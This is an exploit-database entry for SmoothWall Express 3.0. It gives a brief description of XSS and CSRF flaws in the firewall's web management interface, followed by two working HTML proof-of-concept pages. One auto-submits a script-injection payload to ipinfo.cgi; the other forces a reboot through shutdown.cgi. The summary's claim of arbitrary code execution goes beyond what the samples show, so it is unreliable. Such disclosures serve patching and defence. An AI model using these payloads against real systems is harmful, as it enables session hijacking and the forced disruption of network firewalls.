header-logo
Suggest Exploit
vendor:
SmoothWall Express
by:
Anonymous

SmoothWall Express 3.0 xss and csrf

The web management interface of SmoothWall Express 3.0 is vulnerable to XSS and CSRF. An attacker can exploit this vulnerability by sending a malicious script to the web management interface of SmoothWall Express 3.0. The malicious script can be used to execute arbitrary code on the vulnerable system. For CSRF, an attacker can send a malicious request to the web management interface of SmoothWall Express 3.0, which can be used to execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.
Source

Exploit-DB raw data:

The web management interface of SmoothWall Express 3.0 is vulnerable
to xss and csrf.

xss example:

<html>
<title> SmoothWall Express 3.0 xss </title>
<body>
 <form action="http://192.168.0.1:81/cgi-bin/ipinfo.cgi"; method="post"
id="xssplz">
        <input type="hidden" name="IP" value='"<script>alert(1);</script>'></input>
        <input type="hidden" name="ACTION" value='Run'></input>
</form>
<script>document.getElementById("xssplz").submit();</script>
</body>


csrf example:

<html>
<title>  SmoothWall Express 3.0 csrf </title>
<body>
 <form action="http://192.168.0.1:81/cgi-bin/shutdown.cgi";
method="post" id="csrfplz">
        <input type="hidden" name="ACTION" value='Reboot'></input>
</form>
<script>document.getElementById("csrfplz").submit();</script>
</body>